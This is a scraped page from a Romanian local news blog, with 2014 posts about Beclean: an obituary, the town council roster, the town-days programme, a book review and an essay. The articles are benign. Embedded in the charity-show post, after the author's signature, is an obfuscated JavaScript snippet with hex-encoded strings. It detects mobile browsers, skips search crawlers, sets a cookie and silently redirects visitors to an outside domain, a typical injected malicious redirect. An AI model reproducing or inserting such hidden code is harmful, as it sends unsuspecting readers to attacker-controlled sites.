S-A STINS UN OM REMARCABIL. NICOLAE DĂNUȚ PRUNEA, PROFESOR, FOST SENATOR PSD, A MURIT

written by J de S | 17/08/2014

Profesorul de fizică Nicolae Dănuț Prunea, în vârstă de 62 de ani, a murit astăzi, în jurul orei 19.00. Se pare că a făcut infarct. Cadru didactic la Colegiul “Petru Rareș” Beclean, profesorul Prunea a fost și senator în parlamentul României în circumscripția electorală nr.6 BISTRIȚA-NĂSĂUD, colegiul uninominal nr.2 pe listele Alianței Politice Partidul Social Democrat + Partidul Conservator. Dumnezeu să-l odihnească!

FEDEREII DIN BECLEAN, ÎNTÂLNIRE DUPĂ 15 ANI

written by J de S | 17/08/2014

S-au reîntâlnit după mai bine de 15 ani. Foști frați de suferință, de la Casa de copii Beclean: F.D.R. ( FEDEREII). Guvernanții au denumit-o Centrul de Plasament, iar mai apoi Centrul pentru Protecția Copilului. În inimile acestor oameni, instituția care i-a crescut și a încercat să facă, din sufletele lor amputate, oameni, va rămâne, Casa de copii, sau F.D.R. ( FEDEREII).

Foști copii de la Casa de copii cu familiile lor. Mulți veniți din străinătate unde i-a aruncat soarta. S-au revăzut, s-au îmbrățișat, au revăzut locurile unde și-au petrecut copilăria Au depănat mai apoi, la o bere, amintiri. Emoții. Lacrimi furișate sub pleoape.

PRIMARUL NICU MOLDOVAN LA CERNĂUȚI

written by J de S | 17/08/2014

Primarul Nicu Moldovan a participat, în perioada 1-3 august, la acțiunea ”Dialoguri culturale în comunitățile românești din diaspora”. Delegația județului Bistrița-Năsăud la Cernăuți, a fost condusă de către președintele C J Radu Moldovan.

Acțiunea organizată la inițiativa Bibliotecii Județene ”George Coșbuc”, în colaborare cu Centrul Județean pentru Cultură, Complexul Muzeal Bistrița-Năsăud și Fundația Culturală ”Casa limbii române” din Cernăuți, s-a desfășurat în perioada 1-3 august în mai multe localități din Regiunea Cernăuți.

Alături de primarul Orașului Beclean, Nicu Moldovan și primarii comunelor Zagra și Budești, Dumitru Bușcoiu, respectiv Vasile Codrea, președintele CJ Radu Moldovan a avut o întrevedere cu Consulul General al României la Cernăuți, Excelența Sa Eleonora Moldovan.

Programul activităților a cuprins întâlniri oficiale cu reprezentanții administrației Regiunii Cernăuți, spectacole caritabile, donații de carte și semnarea unor acorduri de parteneriat în domeniul cultural.

“În debutul proiectului ”Dialoguri culturale la Cernăuți” am avut o întrevedere cu Guvernatorul Regiunii Cernăuți, Roman Vanzuryak. În cadrul întâlnirii am exprimat suportul nostru, al românilor, pentru statul Ucrainean și pentru românii din Regiunea Cernăuți.” a declarat președintele CJ Radu Moldovan.

PAROHIA LUI DAN COMAN

written by J de S | 17/08/2014

Dacă a fost ceva care m-a făcut să nu închid cartea de la primele pagini a fost tocmai aceste necuvântătore. Ale șchioapei Ninia: „ Trăgeam clopotul și, dacă n-o priveam pe ea, priveam animalele ei zbenguindu-se prin clopotnița strîmtă, făcând salturi ușoare unele peste altele și plutind secunde bune prin aer, de-a lungul dungilor de fum și lumină care intrau printre crăpăturile dintre scînduri”.

Dan Coman face un decupaj din vremurile de tristă amintire, teleportând din acele ținuturi ireale un idiot. Un imbecil: fiul preotului dintr-un sat românesc care, la treizeci de ani, încă păzește găinile și, printre alte năzbâtii, face și pe informatorul: scrie cuvânt cu cuvânt ce-i dictează milițianul Mîrza, exponentul omului execrabil. De cea mai joasă speță: „ Mîrza își scosese bastonul de cauciuc și, aplecat într-o rână, îi dădea din greu peste spate, l-a lovit și cu picioarele, îl vedeam transpirând de la atâta efort. Ionică nu mai scotea nici un zgomot…”. În schimb, preotul, tatăl imbecilului, este un tip cu coloană vertebrală, în ciuda loviturilor în stomac pe care i le aplică bruta de Mîrza.

Dacă informatorii și securiștii au reușit, după așa zisa revoluție, să-și schimbe părul pozând în politicieni și curve, majoritatea preoților, din păcate, au rămas aceeași limbuți a căror trăncăneală fac pereții bisericii să tremure și enoriașii să doarmă: „Să facem mai întîi o rugăciune, părinte, a zis celălalt preot după ce ne-am adunat iar la masă. Ne-am ridicat cu toții. Acum, îmi ziceam, numai să nu-l lase pe tata să facă rugăciunea, o lungea foarte mult, nu ierta nici o propoziție, nici un cuvințel, pînă și mama se enerva pe el. Și-apoi vocea lui cînd zicea rugăciuni, mi se făcea extrem de rușine auzind-o. Dar mă speriasem degeaba, celălalt preot a rostit un tatăl nostru prescurtat, n-a durat mai mult de două minute. Vezi, i-a zis mama în noaptea aceea, așa se face, altfel enoriașii se plictisesc, de ce crezi că-s atîția care dorm acolo, în picioare, în timpul sfintei slujbe?”

În Parohia, descrierea satului totalitar cu tradițiile și obiceiurile lui, e doar fundalul. Retabulum. Și tot acolo, undeva mai în spate, învăluit în ceață, precum piscurile înzăpezite, mi s-a părut că aud vocea, abia șoptită, a unui cor dirijat de corifeul Herta Muller. Pe scenă însă joacă și dansează în stilul supra(realist) magic animalele Niniei, pe care n-ai cum să nu le iubești și să asculți, în surdină, cum sună „ca o morișcă de jucărie învîrtită de o rafală de vînt.”

EI NE REPREZINTĂ ÎN CONSILIUL LOCAL BECLEAN

written by J de S | 17/08/2014

Consiliile locale și primarii funcționează ca autorități ale administrației publice locale și rezolvă treburile publice din comune, orașe și municipii, în condițiile legii.Consiliile locale sunt compuse din consilieri locali aleși prin vot universal, egal, direct, secret și liber exprimat, în condițiile stabilite de legea pentru alegerea autorităților administrației publice locale.

Consiliul local are inițiativă și hotărăște, în condițiile legii, în toate problemele de interes local, cu excepția celor care sunt date prin lege în competența altor autorități ale administrației publice locale sau centrale.

Consiliul local exercită următoarele categorii de atribuții:

•atribuții privind organizarea și funcționarea aparatului de specialitate al primarului, ale instituțiilor și serviciilor publice de interes local și ale societăților comerciale și regiilor autonome de interes local;

• atribuții privind dezvoltarea economico-socială și de mediu a comunei, orașului sau municipiului;

• atribuții privind administrarea domeniului public și privat al comunei, orașului sau municipiului;

• atribuții privind gestionarea serviciilor furnizate către cetățeni;

• atribuții privind cooperarea interinstituțională pe plan intern și extern.

Componența Consiliului Local al orașului Beclean este următoarea:

1. Bilegan Titus PSD

2. Bindea Sever Aurelian PSD

3. Boroș Alexandrina Loredana PSD

4. Borsos Karoly Laszlo UDMR

5. Cârlig Cristian Costel PNL

6. Cîrjac Ioan PSD

15. Cocoi Vasile PNL

7. Costin Bogdan Ioan PDL

8. Lazăr Ioan PSD

9. Mariașiu Mihai PSD

10. Mathe Ștefan UDMR

11. Moldovan Emil Marius PSD

12. Pop Vasile PSD

13. Rusu Bogdan Doru PDL

14. Tușa Bogdan Florian PSD

16. Vereș Zoltan Sandor PSD

17. Vlăduțiu Letiția PDL

Componența comisiilor de specialitate:

I. Comisia pentru programe de dezvoltare economico-sociale, buget, finanțe, administrarea domeniului public și privat al orașului și control comercial, compusă din următorii consilieri locali:

1. D-l Cîrjac Ioan – consilier local – membru;

2. D-l Moldovan Emil Marius consilier local – membru;

3. D-l Bilegan Titus consilier local – membru;

4. D-l Bindea Sever Aurelian consilier local – membru;

5. D-l Borsos Karoly Laszlo consilier local – membru;

6. D-l Cocoi Vasile consilier local – membru;

7. D-l Pop Vasile consilier local – membru;

II. Comisia pentru amenajarea teritoriului și urbanism, realizarea lucrărilor publice și prestări servicii, conservarea monumentelor istorice de arhitectură și protecția mediului, compusă din următorii consilieri locali:

1. D-l Mathe Ștefan consilier local – membru;

2. D-l Bindea Sever Aurelian consilier local – membru;

3. D-na Boroș Alexandrina Loredana consilier local – membru;

4. D-l Moldovan Emil Marius consilier local – membru;

5. D-l Lazăr Ioan consilier local – membru;

6. D-l Tușa Bogdan Florian consilier local – membru;

7. D-l Costin Bogdan Ioan consilier local – membru;

III. Comisia pentru învățământ, sănătate, cultură, culte, tineret, sport și agrement, compusă din următorii consilieri locali:

1. D-l Bilegan Titus consilier local – membru;

2. D-l Borsos Karoly Laszlo consilier local – membru;

3. D-l Vereș Zoltan Sandor consilier local – membru;

4. D-l Cîrjac Ioan consilier local – membru;

5. D-l Pop Vasile consilier local – membru;

6. D-l Mariașiu Mihai consilier local – membru;

7. D-l Rusu Bogdan Doru consilier local – membru;

IV. Comisia pentru administrație publică locală, juridică, apărarea ordinii publice, protecție socială, respectarea drepturilor și libertăților omului, compusă din următorii consilieri locali:

1. D-l Tușa Bogdan Florian consilier local – membru;

2. D-na Boroș Alexandrina consilier local – membru;

3. D-l Vereș Zoltan Sandor consilier local – membru;

4. D-l Lazăr Ioan consilier local – membru;

5. D-l Mariașiu Mihai consilier local – membru;

6. D-l Cârlig Cristian Costel consilier local – membru;

7. D-na Vlăduțiu Letiția consilier local – membru;

SĂRBĂTOAREA BECLEANULUI, PE RITMURI AFRICANE

written by J de S | 17/08/2014

” 2014 este cel mai important an pentru dezvoltarea orașului, din punctul de vedere al obiectivelor de investii. Nu mi-a plăcut niciodată să trăiesc în trecut, ci să văd în viitor, iar pentru asta trebuie să construiești în prezent. ”, a declarat primarul Nicu Moldovan, cu prilejul deschiderii Zilelor orașului Beclean.

. ”Vom reuși până la urmă să rezolvăm și marea provocare a Becleanului, șoseaua ocolitoare”, a mai spus Nicu Moldovan.

MÂINE ÎNCEP ZILELE ORAȘULUI BECLEAN

written by J de S | 17/08/2014

Orașul Beclean împlinește anul acesta 779 de ani de la prima atestare istorică, iar Zilele Orașului Beclean se află la ediția cu numărul XII. Bugetul alocat de Primărie pentru Zilele Orașului Beclean a fost de 30.000 de euro, bani din care vor fi plătiți artiștii și costurile aferente organizării.

Vor mai fi, ca de obicei, comercianți cu produse alimentare, mese cu umbrele mari unde se poate servi mâncarea, jocuri pentru copii și adulți, concursuri de fotbal și alte activități de recreere, pentru serbarea Zilelor Orașului Beclean 2014.

„Pata de culoare a Zilelor Orașului Beclean 2014 vor fi africanii de la trupa Mbondo, care se aflau într-un turneu în Europa și pe care i-am invitat încoace. Vor fi niște zile deosebite pentru beclenari și pentru toți cei care vor veni să ne viziteze în ceas de sărbătoare”, a spus pentru Vocea Transilvaniei Nicolae Moldovan, primarul orașului Beclean.

Programul complet al Zilelor Orașului Beclean 2014:

VINERI, 27 IUNIE

– între orele 9.00 și 10.00 – Ședința tehnică a concursului „Campionatului Național de Atelaje”

Amplasament: baza hipică Herghelie

– între orele 10.30 și 11.30 – Control sanitar- veterinar în cadrul „Campionat Național de Atelaje”

Amplasament: baza hipică Herghelie

– ora 12.00 – Proba A: Prezentare și dresaj la „Campionatul Național de Atelaje”

Amplasament: baza hipică Herghelie

– ora 11.00 – Deschiderea oficială a Zilelor Orașului Beclean 2014

Amplasament: Primăria orașului Beclean

Casa Orășenească de Cultură „Radu Săplăcan”

– ora 13.00 – Spectacol grupul Mbunda – Africa

Amplasament: Băile Figa

– între orele 15.00 și 19.00 – Fotbal – Cupa orașului Beclean

Amplasament: terenul sintetic Corăbean și terenul sintetic Băile Figa

– ora 18.00 – Recunoașterea traseului de maraton la „Campionatul Național de Atelaje”

Amplasament: baza hipică Herghelie

– între orele 18.30 și 23.00 – Spectacol folcloric

Amplasament: scena din Piața Mare

Participă soliștii vocali Anuța Motofelea, Nicu Cioancă, Cristina Retegan, Alexandru Pugna și Ansamblurile folclorice Cununița – Clubul Copiilor Beclean, Someșul – Beclean, Alma Virág – dansuri și cântece maghiare, Mbunda – Africa cu muzică tradițională africană.

Organizatorii mai pregătesc și alte surprize pentru iubitorii de folclor.

SÂMBĂTĂ, 28 IUNIE

– ora 9.00 – Festivalul Vânătoresc „Vânătoare la ceaun” – ediția a V–a

Amplasament: Băile Figa

În cadrul festivalului de „vânătoare la ceaun” vor fi:

– expoziții cu caracter vânătoresc (trofee, obiecte de artizanat de inspirație vânătorească, fotografii și obiecte de artă cu tematică cinegetică);

– prezentarea a două dintre cele mai apreciate rase de câini de vânătoare : Limierul Bavarez și Bracul German cu Păr Sârmos, cu demonstrații de lucru;

– concursul pe echipe de gătit la ceaun carne de vânat și promovarea culturii vânătorești;

– concursul individual de provocare din mijloace tradițional vânătorești a taurului de cerb aflat în perioada boncănitului, MUGET DE CERB;

– concurs JAGER-AUTO, competiția celei mai bine dotate și inspirat pregătite dintre mașinile aparținând vânătorilor și destinate folosirii la vânătoare.

– ora 10.00 – Proba B de Maraton a „Campionatului Național de Atelaje”

Amplasament: baza hipică Herghelie

– ora 10.00 – Concurs de desene pe asfalt și patinaj pe role

Amplasament: Parcul Central

– ora 11.00 – Spectacol – concurs „Tip -Top Minitop”

Amplasament: Casa Orășenească de Cultură „Radu Săplăcan”

– ora 13.00 – Spectacol grupul Mbunda – Africa

Amplasament: Băile Figa

– între orele 14.00 și 20.00 – Fotbal – Cupa orașului Beclean

Amplasament: terenul sintetic Corăbean și terenul sintetic Băile Figa

– ora 19.00 – Cina festivă în cadrul „Campionatului Național de Atelaje”

Amplasament: baza hipică Herghelie

– între orele 19.30 și 21.00 – Spectacol de muzică cu Formații locale

Amplasament: scena din Piața Mare

21.00 – 24.00 – Spectacol de muzică ușoară

Amplasament: scena din Piața Mare

1. între orele 21.00 și 22.00 – ELENA GHEORGHE

2. între orele 22.00 și 23.00 – PEPE

3. între orele 23.00 și 24.00 – ANTONIA

DUMINICĂ, 29 IUNIE

– între orele 9.00 și 12.00 – Slujbe religioase

– ora 9.00 – Control sanitar – veterinar la „Campionatul Național de Atelaje”

Amplasament: baza hipică Herghelie

– ora 10.30 – Proba C: Obstacole „Campionatul Național de Atelaje”

Amplasament: baza hipică Herghelie

– ora 13.00 – FESTIVITATE DE PREMIERE – CUPA ROMSILVA a „Campionatului Național de Atelaje”

Premierea probelor A, B, C și compusă

Amplasament: baza hipică Herghelie

– între orele 10.00 și 13.00 – Semifinalele și finala Cupei orașului Beclean la fotbal

Amplasament: terenul sintetic Băile Figa

– ora 13.00 – Decernarea premiilor Cupei orașului Beclean

Amplasament: terenul sintetic Băile Figa

– 19.30 – 21.00 – Spectacol de muzică ușoară cu formații locale

Amplasament: scena din Piața Mare

– 21.00 – 24.00 – Spectacol de muzică ușoară

Amplasament: scena din Piața Mare

1. între orele 21.00 și 22.00 – CONNECT-R

2. între orele 22.00 și 23.00 – LORA

3. între orele 23.00 și 24.00 – SMILEY

GENERAȚIA DE AUR A BECLEANULUI

written by J de S | 17/08/2014

Am participat astăzi, 11 Iunie, la Casa de Cultură „Radu Săplăcan”, la Spectacolul de caritate „Dăruind vei dobândi”, ediția a IV-a. Sub lozinca „Elevii de la Petru Rareș au talent”, organizatorii și-au propus ca anul acesta să o ajute pe Emilia, colega lor, care a suferit o intervenție chirurgicală pentru înlăturarea unei tumori cerebrale iar acum necesită tratament de recuperare.

Am rămas plăcut și profund impresionat de talentul acestor reprezentanți ai noii generații, iar mesajul meu pentru ei este: Sunteți niște copii minunați, talentați și buni, mai ales buni, pentru că ați ales să vă puneți talentul în slujba unui scop nobil, acela de a o ajuta pe Emilia. De aceea vă mulțumesc tuturor cântăreților, dansatorilor, actorilor, prestidigitatorilor din noua generație, pentru lecția de bunătate, milă, compasiune, empatie, pe care ne-ați predat-o astăzi nouă, celor din generația mai veche. Astăzi elevii au fost profesori și profesorii elevi. Talentul vostru este un dar de la Dumnezeu și trebuie folosit pentru a ajuta alți oameni. Nu renunțați la dorințele voastre pentru că vi se vor îndeplini, urmați-vă visurile și nu renunțați, pentru că doar așa ele vor deveni reale!

Mai mult decât de banii care s-au adunat, și care vor fi donați Emiliei, ea are nevoie de noi, să știe că suntem alături de ea, că o iubim și o ajutăm. Vă mulțumesc!

Acum vestea bună pentru voi: Emilia se simte mai bine. Când am vizitat-o ultima dată, ne-a arătat foarte mândră de ea că poate sta acum în poziția șezut singură. I-am spus că în fiecare zi, va fi din ce în ce mai bine, pentru că Dumnezeu o iubeste și o vindeca, dar treptat, nu dintr-o dată. Pentru că răul vine dintr-o dată și trece treptat, dar trece. Am râs, am vorbit, am făcut poze, am citit poezii scrise de Emilia. A fost o zi deosebită. Am aflat și că a făcut primii pași cu ajutorul unui cadru special, iar dorința ei cea mai mare este să poată merge singură, până în august, când este ziua ei.

Paul Boroșvar _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

INTRODUCEREA APEI ÎN CICEU – GIURGEȘTI: REALIZARE ISTORICĂ PENTRU PRIMARUL RUSU CONSTANTIN

written by J de S | 17/08/2014

Cea mai mare investiție realizată vreodată în comuna Ciceu-Giurgești a fost inaugurată de curând, în prezența parlamentarilor de prin părțile locului și a oficialilor din administrația publică locală și județeană.

Rețeaua de apă și stația de pompare, au fost posibile datorită unui demers început în 2008, finanțat din fonduri guvernamentale, cu contribuție locală și județeană. Reprezentanți ai Consiliului Județean, ai Prefecturii și ai altor instituții au participat la inaugurarea sistemului de aducțiune a apei potabile construit în localitatea Ciceu-Giurgești. Investiția realizată din fonduri guvernamentale însumează aproximativ 5,34 milioane de lei și s-a materializat în 21,5 kilometri de rețea în localitatea de centru a comunei administrate de către primarul Constantin Rusu. Tăierea panglicii a fost urmată de un spectacol pe care artiștii Casei de Cultură „Radu Săplăcan” din Beclean l-au susținut la Căminul Cultural.

Peste un milion de euro alocați pentru acest obiectiv a transformat în realitate un vis mai vechi al primarului Rusu Constantin: acela de a avea apă la robinete. Și asta în condițiile în care cel puțin două luni de vară din an seceta împiedica alimentările corespunzătoare.

Sistemul de distribuție se întinde pe 21,5 kilometri și deschide posibilitatea branșării individuale pentru aproximativ 400 de gospodării. Posibilități de introducere a apei se prevăd și pentru comuna Negrilești. La manifestările inaugurale au participat: președintele Consiliului Județean, Emil Radu Moldovan, vicele de la aceeași instituție, Alexandru Pugna, subprefectul Ovidiu Frenț, deputatul Daniel Suciu, senatorul Ioan Deneș, primarul de Beclean, Nicolae Moldovan, administratorul public din Bistrița-Năsăud, Florin Moldovan, gospodarii comunelor Petru Rareș, Negrilești, Braniștea, directorul “Aquabis”, Ioan Șandru, constructorii, fii ai satului etc. Gazdă le-a fost „cel mai înțelept primar”, cum l-a numit președintele Radu Moldovan pe venerabilul Constantin Rusu, cel care, la o onorabilă vârstă, a reușit, cu sprijin județean și guvernamental, să modernizeze comuna în mandatele dedicate locuitorilor din Ciceu Giurgești. Dovadă că aceștia au parte de un minim de confort în plus sunt nu doar robinetele ce stau să curgă în casele oamenilor, ci și căminele culturale modernizate, drumul asfaltat spre Dumbrăveni, sediul modern al primăriei și așa mai departe.

Sărbătoarea dedicată celei mai frumoase zile a comunei de la poalele cetății Ciceului a cuprins un Te Deum susținut de doi preoți, programul artistic al Casei de Cultură “Radu Săplăcan” din Beclean, scurte cuvântări ale oaspeților și o după-amiază de recreere organizată în zona de agrement a Ocolului Silvic de pe raza localității Reteag. Surpriza zilei a venit de la Văru Săndel, spre buna dispoziție a sătenilor.

Acces la rețelele de apă pentru 90 la sută din populația județului, până în 2017. Obiectivul a fost subliniat de președintele Consiliului Județean, Emil Radu Moldovan, cel care a vorbit la Ciceu Giurgești despre proiectele ample desfășurate în Bistrița-Năsăud în efortul de dezvoltare a comunităților locale. Masterplanul privind extinderea și îmbunătățirea rețelelor de apă și canalizare e unul dintre ele. 144 de milioane de euro sunt, pentru etapa a doua, finanțările europene aflate în proceduri pentru ca obiective precum cel amintit să devină realitate în următorii ani.

CONTAINERE SEMI – ÎNGROPATE LA BECLEAN

written by J de S | 17/08/2014

Primarul Nicu Moldovan a început în forță implementarea în orașul Beclean a proiectului ,,Sistem integrat de management al deșeurilor solide în județul Bistrița-Năsăud „. Mai exact a realizării platformelor de containere semi – îngropate pentru colectarea deșeurilor.

Este un proiect deosebit care are ca scop o mult mai bună colectare a deșeurilor selective, hârtie, carton, PET, sticlă. Aceste containere nu pot fi accesate de persoane neautorizate, două treimi din container este subteran și este prevăzut cu capac etanș și sistem de închidere.

Potrivit primarului Moldovan vor fi amenajate peste 200 de platforme pentru containere semi – îngropate, identificate pe planurile de situație, inclusiv cu coordonate GPS. Au fost stabilite amplasamentele pentru aceste platforme, astfel încât să fie realizată o acoperire echilibrată din acest punct de vedere a tuturor cartierelor și zonelor orașului.

JANDARMII DIN BECLEAN ÎN CASĂ NOUĂ

written by J de S | 17/08/2014

Sâmbătă, 31 mai, a avut loc inaugurarea sediului în care va funcționa plutonul de jandarmi al orașului Beclean. Sediul este amenajat în incinta clădirii fostei maternități a orașului. Plutonul este format din 25 de ofițeri și un subofițer. Rolul jandarmilor: responsabili cu ordinea și liniștea publică a orașului, asigură paza și buna funcționare a Băilor Figa pe toată durata sezonului estival.

La eveniment au participat primarul Nicu Moldovan, prefectul Ioan Țintean, președintele Consiliului Județean, Radu Moldovan, secundul său, Dorin Popescu, deputatul Daniel Suciu, senatorul Ioan Deneș, șefi în uniformă, protopopul de Beclean, Doru Zinveliu și omologul său din Năsăud, Ioan Dâmbu, reprezentanți ai administrației publice locale.

Cu acest prilej, Emil Radu Moldovan, președintele Consiliului Județean, a declarat: am participat astăzi la inaugurarea noului sediul al Jandarmeriei din orașul Beclean. E un moment de sărbătoare, încă o dovadă clară că Beclean orașul e cel mai viu dintre cele trei din Bistrița-Năsăud, s-a transformat în bine cel mai mult în ultima perioadă, lucru care i se datorează în primul rând primarului. Sper ca liniștea și ordinea la nivelul orașului să fie asigurată la cele mai înalte standarde!

ÎNTRE VIAȚĂ ȘI MOARTE

written by J de S | 17/08/2014

Voi încerca să răspund la o întrebare care-mi frământă de ceva timp existența mea efemeră dar răspunsurile vor fi limitate de neajunsurile pe care mi le oferă o gândire specifică tuturor ființelor omenești.

Întrebarea este: Ne facem noi viața sau viața ne face pe noi?

Dacă aș folosi doar un anumit sens peiorativ al verbului a face, atât de specific tuturor copiilor postmoderni aș spune că: Nu noi ne facem viața, viața ne face pe noi, uneori în cele mai perverse feluri! Sau, altfel spus, cum am citit undeva pe net: Nimeni nu moare virgin pentru că pe fiecare viața îl face cel puțin o dată!

Ajungem să trăim o viață pe care nu am vrut-o și pe care nici măcar nu am gândit-o, cu situații la care nu ne-am fi așteptat și în locuri pe care nici nu le-am visat. Și dacă intervenim în viața noastră pentru a schimba ceva, de fapt reușim doar să stricăm lucrurile. Cu câțiva ani în urmă nici nu mi-am imaginat ca voi ajunge să fiu ceea ce sunt acum, sa fiu cum sunt acum, sa trăiesc viața pe care o trăiesc acum. În fiecare secundă lucrurile noi cu care intram în contact ne schimbă, cuvintele pe care le auzim ne schimbă, oamenii din jurul nostru ne schimba. Ei te fac să râzi, să plângi, să te bucuri, să suferi, să te minunezi, să te enervezi, și toate duc la modelarea personalității tale într-un așa hal încât devii de nerecunoscut chiar pentru tine însuti, încât ajungi să te întrebi ca Emil Cioran: Cum de-am putut să fiu cel care eram?

Tu ce-ai fi vrut să faci cu viața ta? Este așa cum ți-ai dorit-o? Dacă ți se pare că e tristă, goală și fără sens liniștește-te pentru că se va termina oricum. Cu fiecare zi care trece suntem tot mai departe de viață și tot mai aproape de moarte. Și suntem toți niște curve pentru că până la urmă ne înșelăm viața cu moartea.

Din umbra cadavrelor zilelor crepusculare moartea rânjește la tine.

Și tocmai din acest motiv trebuie să-ți iubești viața ta trecătoare, pentru că atunci când ți se pare tristă, goală și fără sens și-ți vine să-ți iei zilele, dar reușești să mergi mai departe, vei deveni mai puternic.

Albert Camus ne spune că Sisif fusese osândit de zei să împingă o stâncă până în vârful muntelui, apoi să îi aștepte coborârea pentru a-și relua munca aceasta îngrozitoare și fără sens. Dar Sisif este fericit pentru că stânca e a lui. Fiecare atom al acelei stânci, fiecare colț mineral al acelui munte întunecat constituie o lume în sine însuși. Lupta însăși înspre înălțimi este suficientă pentru a umple inima unui om. Trebuie să ni-l imaginăm pe Sisif fericit. (Albert Camus – Mitul lui Sisif)

Sunt fericit nu pentru ceea ce-mi oferă viața în fiecare zi, sunt fericit în fiecare zi pentru că e viața mea și o trăiesc!

Paul Boroș

TEATRU RELIGIOS LA CENTRUL PENTRU PROTECȚIA COPILULUI BECLEAN

written by J de S | 17/08/2014

Mănăstirea „Nașterea Maicii Domnului” din Piatra Fântânele prin stavrofor Pamfilia Solcan, împreună cu un grup de copii de la școala Gimnazială din Piatra Fântânele au susținut , zilele trecute, la Centrul pentru Protecția Copilului Beclean un program artistic deosebit.

Scenetele religioase interpretate de elevi, coordonați de măicuțele mănăstirii și cadrele didactice au impresionat publicul. Mesajul scenetelor au avut un impact deosebit. Scenetele au vorbit despre curaj, despre întoarcerea fiului risipitor, despre credința în Dumnezeu.

CENTRUL ȘCOLAR DE EDUCAȚIE INCLUZIVĂ BECLEAN ÎN PERICOL DE A FI DESFIINȚAT

written by J de S | 17/08/2014

La Centrul Școlar de Educație Incluzivă Beclean a fost pus, sămbătă, 10 mai, pe tapet, proiectul interinstituțional pentru promovarea drepturilor copilului cu dezabilități, numit “acceptă, înțelege, respectă”. Dincolo de stereotipiile și a formalităților de rigoare în care s-a excelat , a impresionat plăcut programul susținut de elevii școlii.

